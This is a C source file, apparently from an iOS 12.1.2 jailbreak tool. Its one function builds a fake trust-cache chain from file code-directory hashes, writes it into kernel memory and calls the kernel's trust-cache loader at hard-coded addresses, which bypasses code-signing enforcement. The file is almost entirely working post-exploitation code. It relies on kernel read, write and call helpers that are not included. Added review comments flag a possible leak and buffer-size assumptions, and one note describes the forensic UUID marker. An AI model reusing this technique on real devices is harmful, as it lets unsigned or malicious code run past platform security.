c_cpp inject_trusts-IOS-v12.1.2-16C104-iPhone11,x.c
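/*
 * inject_trusts - build a trust-cache chain holding the SHA-256 of each
 * file's code directory and hand it to the kernel's trust-cache loader.
 *
 * Target: iPhone11,2 / 11,4 / 11,6 (per the file name: iOS 12.1.2, 16C104).
 * Both kernel addresses below are hard-coded for that one build; on any
 * other build they refer to unrelated kernel memory.
 *
 * The routine relies on kernel read/write/alloc/call helpers
 * (kernel_read64, kernel_write, kalloc, kernel_call_7) that are defined
 * elsewhere; it does nothing useful without them.
 *
 * @param pathc  number of entries in paths
 * @param paths  file paths whose code directories are hashed; entries for
 *               which getCodeDirectory() returns NULL are skipped
 *
 * Forensics note: every chain built here carries the fixed 16-byte UUID
 * pattern 0xabadbabeabadbabe (twice), so an injected chain is recognisable
 * in a kernel memory image.
 */
void inject_trusts(int pathc, const char *paths[])
{
    printf("[+] injecting into trust cache...\n");

    if (pathc <= 0 || paths == NULL) {
        /* Nothing to hash: do not allocate or touch kernel memory. */
        printf("[-] no paths given, nothing injected\n");
        return;
    }

    extern uint64_t g_kern_base;
    static uint64_t tc = 0;
    if (tc == 0) {
        // loaded_trust_caches: 0xFFFFFFF008F702C8
        // (build-specific address minus the build's static kernel base,
        //  rebased onto the runtime base)
        tc = g_kern_base + (0xFFFFFFF008F702C8 - 0xFFFFFFF007004000);
    }
    printf("[+] trust cache: 0x%llx\n", (unsigned long long)tc);

    /*
     * Zero the header first: the whole struct is copied into kernel memory
     * below, and padding or unset fields would otherwise carry stale stack
     * bytes.
     */
    struct trust_chain fake_chain;
    memset(&fake_chain, 0, sizeof(fake_chain));
    fake_chain.next = kernel_read64(tc);

    /* memcpy instead of a uint64_t* cast: same bytes, no aliasing or
     * alignment assumptions about the uuid field. */
    const uint64_t uuid_marker = 0xabadbabeabadbabe;
    memcpy(&fake_chain.uuid[0], &uuid_marker, sizeof(uuid_marker));
    memcpy(&fake_chain.uuid[8], &uuid_marker, sizeof(uuid_marker));

    /* calloc checks the count * size multiplication for overflow. */
    hash_t *allhash = calloc((size_t)pathc, sizeof(hash_t));
    if (allhash == NULL) {
        printf("[-] out of memory, nothing injected\n");
        return;
    }

    int cnt = 0;
    uint8_t hash[CC_SHA256_DIGEST_LENGTH];
    for (int i = 0; i != pathc; ++i) {
        /* NOTE(review): ownership of cd is not visible here; if
         * getCodeDirectory() allocates, the buffer is leaked. */
        uint8_t *cd = getCodeDirectory(paths[i]);
        if (cd == NULL) {
            continue;
        }
        getSHA256inplace(cd, hash);
        /* NOTE(review): copies sizeof(hash_t) bytes out of a
         * CC_SHA256_DIGEST_LENGTH buffer; assumes hash_t is not larger
         * than the digest — confirm against the hash_t definition. */
        memmove(allhash[cnt], hash, sizeof(hash_t));
        ++cnt;
    }

    if (cnt == 0) {
        /* No code directory could be hashed: leave the kernel untouched. */
        printf("[-] no usable code directories, nothing injected\n");
        free(allhash);
        return;
    }
    fake_chain.count = cnt;

    /* Header plus hashes, rounded up to a 0x4000-byte multiple. */
    size_t length = (sizeof(fake_chain) + (size_t)cnt * sizeof(hash_t) + 0x3FFF)
                    & ~(size_t)0x3FFF;
    uint64_t kernel_trust = kalloc(length);
    printf("[+] kalloc: 0x%llx\n", (unsigned long long)kernel_trust);
    if (kernel_trust == 0) {
        /* presumably kalloc() yields 0 on failure — confirm against helper */
        printf("[-] kalloc failed, nothing injected\n");
        free(allhash);
        return;
    }

    printf("[+] writing fake_chain\n");
    kernel_write(kernel_trust, &fake_chain, sizeof(fake_chain));
    printf("[+] writing allhash\n");
    kernel_write(kernel_trust + sizeof(fake_chain), allhash, (size_t)cnt * sizeof(hash_t));

    /* The user-space copy is no longer needed once it is in kernel memory;
     * the original never released it. */
    free(allhash);

    printf("[+] writing trust cache\n");
#if (0)
    kernel_write64(tc, kernel_trust);
#else
    // load_trust_cache: 0xFFFFFFF007B80504
    uint64_t f_load_trust_cache = g_kern_base + (0xFFFFFFF007B80504 - 0xFFFFFFF007004000);
    uint32_t ret = kernel_call_7(f_load_trust_cache, 3,
                                 kernel_trust,
                                 length,
                                 0);
    /* NOTE(review): ret is only logged; the success message below is
     * printed whatever the kernel routine returned. */
    printf("[+] load_trust_cache: 0x%x\n", ret);
#endif
    printf("[+] injected trust cache\n");
}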